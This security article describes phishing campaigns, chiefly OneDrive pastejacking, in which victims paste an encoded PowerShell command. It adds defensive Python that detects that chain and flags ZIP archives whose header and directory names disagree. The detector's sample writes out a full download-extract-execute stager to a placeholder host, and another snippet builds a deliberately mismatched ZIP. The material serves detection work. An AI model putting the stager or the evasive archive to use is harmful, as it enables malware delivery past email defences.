Phishing Campaigns on Microsoft OneDrive Users | DROP Organization


In recent weeks, the Trellix Advanced Research Center has observed a sophisticated phishing campaign targeting Microsoft OneDrive users. The attackers rely on social engineering to talk users into running a PowerShell script themselves, which leads to the compromise of their systems.

Trellix is tracking the "crafty" phishing and downloader campaign under the name OneDrive Pastejacking. The attack begins with an email carrying an HTML attachment that, when opened, displays an image simulating a OneDrive page together with an error message: "Failed to connect to the 'OneDrive' cloud service. For fixing such, you are required to update the DNS cache manually."

The message offers two options, "How to fix" and "Details". "Details" sends the recipient to a legitimate Microsoft Learn page on troubleshooting DNS. "How to fix" walks the user through a series of steps: press Windows Key + X to open the Quick Link menu, launch a PowerShell terminal from it, and paste a Base64-encoded command that supposedly fixes the issue. No vulnerability is exploited; the victim is persuaded to run the attacker's code in their own session.

The command [...] first runs ipconfig /flushdns, then creates a folder on the C: drive named 'downloads'. It then downloads an archive file into that folder, renames it, extracts its contents ('script.a3x' and 'AutoIt3.exe'), and executes script.a3x with AutoIt3.exe. The DNS flush does nothing for the attacker; it only makes the "fix" look like it is doing what the error message promised.
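The pasted command reaches the endpoint as a PowerShell process whose real content is hidden inside a Base64 argument, so a detection has to decode before it can match. The following is an added example (mine, not Trellix's code and not the campaign's script) of that decode-then-match step over process-creation command lines. The indicator names, the regular expressions, the stager text and the placeholder URL (example.invalid) are all constructed from the chain described above; the `-EncodedCommand` argument is UTF-16LE Base64, which is what PowerShell requires.

```python
import base64
import re

# Switch forms PowerShell accepts for -EncodedCommand (it also takes other
# prefixes; these are the common ones), followed by a Base64 blob.
ENC_FLAG = re.compile(r"(-(?:e|ec|en|enc|encodedcommand)\s+)([A-Za-z0-9+/=]{16,})", re.I)
# Inline decoding inside a script, e.g. [Convert]::FromBase64String('...')
INLINE_B64 = re.compile(r"(FromBase64String\(\s*['\"])([A-Za-z0-9+/=]{16,})(['\"]\s*\))", re.I)

# One pattern per step of the chain described in the article. Names and
# patterns are mine, written from that description, not from the real script.
INDICATORS = {
    "flushdns": re.compile(r"ipconfig\s*/flushdns", re.I),
    "staging_dir": re.compile(r"(?:New-Item|\bmkdir|\bmd)\b[^;|]*C:\\downloads", re.I),
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|DownloadString|Start-BitsTransfer", re.I),
    "rename": re.compile(r"Rename-Item|\bren\b|Move-Item|\bmv\b", re.I),
    "extract": re.compile(r"Expand-Archive|ExtractToDirectory|\b7z\b", re.I),
    "autoit": re.compile(r"AutoIt3\.exe|\.a3x\b", re.I),
}


def decode_blob(raw):
    """-EncodedCommand is always UTF-16LE; inline blobs may be UTF-8. ASCII text
    in UTF-16LE has a NUL at every odd offset, which is a cheap way to tell."""
    if len(raw) % 2 == 0 and raw[1::2].count(0) >= len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def peel(text):
    """Blank out every Base64 argument in `text` (so the blob itself cannot
    trigger a string match) and return the decoded contents separately."""
    decoded = []

    def grab(blob):
        try:
            decoded.append(decode_blob(base64.b64decode(blob, validate=True)))
        except ValueError:  # not valid Base64: leave it blanked, decode nothing
            pass
        return "<base64>"

    text = ENC_FLAG.sub(lambda m: m.group(1) + grab(m.group(2)), text)
    text = INLINE_B64.sub(lambda m: m.group(1) + grab(m.group(2)) + m.group(3), text)
    return text, decoded


def expand_layers(cmdline, max_depth=3):
    """The command line plus every Base64 layer peeled from it, outermost first."""
    layers, pending = [], [cmdline]
    for _ in range(max_depth + 1):
        next_pending = []
        for text in pending:
            blanked, decoded = peel(text)
            layers.append(blanked)
            next_pending.extend(decoded)
        if not next_pending:
            break
        pending = next_pending
    return layers


def matched_steps(cmdline):
    """Sorted names of the chain steps found in any layer of the command line."""
    hits = set()
    for layer in expand_layers(cmdline):
        hits.update(name for name, rx in INDICATORS.items() if rx.search(layer))
    return sorted(hits)


def is_pastejacking_chain(cmdline, min_steps=3):
    """A lone flushdns is ordinary admin work; the stager needs a download plus
    at least two more of the steps before it is worth an alert."""
    steps = matched_steps(cmdline)
    return len(steps) >= min_steps and "download" in steps


def encode_command(script):
    """Produce the -EncodedCommand form the lure tells the victim to paste."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples. The URL is a reserved placeholder, not an indicator.
STAGER = (
    "ipconfig /flushdns; "
    "New-Item -ItemType Directory -Force -Path C:\\downloads | Out-Null; "
    "Invoke-WebRequest -Uri https://example.invalid/pkg.bin -OutFile C:\\downloads\\pkg.bin; "
    "Rename-Item -Path C:\\downloads\\pkg.bin -NewName pkg.zip; "
    "Expand-Archive -Path C:\\downloads\\pkg.zip -DestinationPath C:\\downloads; "
    "Start-Process -FilePath C:\\downloads\\AutoIt3.exe -ArgumentList C:\\downloads\\script.a3x"
)
SUSPECT_CMDLINE = "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + encode_command(STAGER)
BENIGN_CMDLINE = "powershell.exe -EncodedCommand " + encode_command("ipconfig /flushdns; Clear-DnsClientCache")

if __name__ == "__main__":
    for line in (SUSPECT_CMDLINE, BENIGN_CMDLINE):
        print(matched_steps(line), is_pastejacking_chain(line))
```

Feed it the CommandLine field of Sysmon Event ID 1 or Security Event 4688 (with command-line auditing enabled). If PowerShell Script Block Logging (Event 4104) is on, the same script arrives already decoded and the indicator patterns can be applied to it directly; the explorer.exe parent and an interactive console host are the other tells that the command was pasted rather than scheduled or scripted.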

The campaign has been observed to target users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.

The disclosure builds on similar findings from ReliaQuest, Proofpoint, and McAfee Labs, which indicate that phishing attacks employing this technique, also tracked as ClickFix, are becoming increasingly prevalent.

The development coincides with the discovery of a new email-based social engineering campaign that distributes bogus Windows shortcut (LNK) files, leading to the execution of malicious payloads hosted on Discord's Content Delivery Network (CDN) infrastructure.

Phishing campaigns have also increasingly been observed sending emails containing links to Microsoft Office Forms from previously compromised legitimate email accounts, enticing targets into disclosing their credentials under the pretext of restoring their Outlook messages.

The threat actors create legitimate-looking forms on Microsoft Office Forms that embed malicious links. These forms are then sent to targets en masse by email under the guise of legitimate requests, such as changing a password or accessing an important document, while mimicking trusted platforms and brands like Adobe or the Microsoft SharePoint document viewer.

Other attack waves have used invoice-themed lures to trick victims into entering their credentials on phishing pages hosted on Cloudflare R2; the captured credentials are then exfiltrated to the threat actor through a Telegram bot.

It is not surprising that adversaries are constantly looking for new ways to smuggle malware past Secure Email Gateways (SEGs) and so increase the likelihood that their attacks succeed.

According to a recent report from Cofense, threat actors are abusing the way SEGs scan ZIP archive attachments to deliver the Formbook information stealer by means of DBatLoader. The trick passes off the HTML payload as an MPEG file, exploiting the fact that many common archive extractors and SEGs parse the file header information but ignore the file footer, which may carry more accurate information about the file format. In ZIP terms, every entry is described twice: by a local file header near the start of the archive and by a central directory entry near its end. The two are supposed to agree, and a parser that trusts only one of them can be told a different story from the other.

The attackers used a .ZIP attachment; when the SEG scanned its contents, the archive appeared to contain a .MPEG video file and was neither blocked nor filtered. Opened with popular extraction tools such as 7-Zip or Power ISO, the archive likewise shows a .MPEG file, but the file will not play. Opened in an Outlook client or with the Windows Explorer archive manager, however, the same entry is identified as a .HTML file. Any disagreement between the two views is itself a strong signal, since a legitimately produced archive never has one.
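To make the header-versus-footer discrepancy concrete, here is an added example (mine, not Cofense's tooling and not the actual attachment) that builds a one-entry ZIP by hand with a different file name in the local file header and in the central directory, then reads the archive both ways and reports the mismatch. The names (clip.mpeg, page.html), the payload and the archive itself are constructed test data; the ZIP layout follows the published format, and Python's `zipfile` is used as the "reads the footer" parser because it locates entries through the central directory.

```python
import io
import struct
import zipfile
import zlib

LOCAL_SIG = b"PK\x03\x04"    # local file header, one per entry, near the start
CENTRAL_SIG = b"PK\x01\x02"  # central directory entry, all grouped at the end ("footer")
EOCD_SIG = b"PK\x05\x06"     # end-of-central-directory record, last thing in the file


def build_zip(local_name, central_name, payload):
    """Write a one-entry, stored (uncompressed) ZIP by hand so the local header
    and the central directory can carry different names. Constructed test data;
    a normal archiver always writes the same name in both places."""
    crc = zlib.crc32(payload) & 0xFFFFFFFF
    ln, cn = local_name.encode(), central_name.encode()
    # version, flags, method(0=stored), mtime, mdate(1980-01-01), crc, csize, usize, nlen, elen
    local = LOCAL_SIG + struct.pack("<HHHHHIIIHH", 20, 0, 0, 0, 0x21, crc,
                                    len(payload), len(payload), len(ln), 0) + ln + payload
    # made_by, needed, flags, method, mtime, mdate, crc, csize, usize,
    # nlen, elen, clen, disk, int_attr, ext_attr, local_header_offset
    central = CENTRAL_SIG + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, 0, 0, 0, 0x21, crc,
                                        len(payload), len(payload), len(cn), 0, 0, 0, 0, 0, 0) + cn
    # disk, cd_disk, entries_here, entries_total, cd_size, cd_offset, comment_len
    eocd = EOCD_SIG + struct.pack("<HHHHIIH", 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def local_header_names(data):
    """What a header-first parser sees: walk the local file headers from offset 0
    and return {offset: name}. Stops at an entry that uses a data descriptor
    (flag bit 3), because its sizes are not known until after the data."""
    names, pos = {}, 0
    while data.startswith(LOCAL_SIG, pos):
        _, flags, _, _, _, _, csize, _, nlen, elen = struct.unpack_from("<HHHHHIIIHH", data, pos + 4)
        name = data[pos + 30:pos + 30 + nlen]
        names[pos] = name.decode("utf-8" if flags & 0x800 else "cp437")
        if flags & 0x8:
            break
        pos += 30 + nlen + elen + csize
    return names


def central_directory_names(data):
    """What a footer-first parser sees: the names recorded in the central
    directory, keyed by the local header offset each entry points at."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {zi.header_offset: zi.filename for zi in zf.infolist()}


def name_mismatches(data):
    """Entries whose two names disagree, as (offset, local_name, central_name)."""
    local = local_header_names(data)
    central = central_directory_names(data)
    return [(off, local.get(off), cname) for off, cname in sorted(central.items())
            if local.get(off) != cname]


def stdlib_rejects(data):
    """Python's zipfile cross-checks the two names when an entry is read and
    raises BadZipFile on a mismatch; a gateway can apply the same cheap check."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            try:
                zf.read(info)
            except zipfile.BadZipFile:
                return True
    return False


# Constructed sample: the header says "video", the central directory says "HTML".
HTML_PAYLOAD = b"<html><body>constructed sample, not a real lure</body></html>"
TRICK_ZIP = build_zip("clip.mpeg", "page.html", HTML_PAYLOAD)
CLEAN_ZIP = build_zip("page.html", "page.html", HTML_PAYLOAD)

if __name__ == "__main__":
    print("header view:   ", local_header_names(TRICK_ZIP))
    print("directory view:", central_directory_names(TRICK_ZIP))
    print("mismatches:    ", name_mismatches(TRICK_ZIP))
```

The check is cheap enough to run on every ZIP attachment: parse both structures, and treat any entry whose names, sizes or CRCs differ between the local header and the central directory as malformed rather than choosing one view. Extensions are only a hint in any case; a content-based sniff of the extracted bytes (here, an HTML document claiming to be video) catches the same attachment regardless of which name a parser believed.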
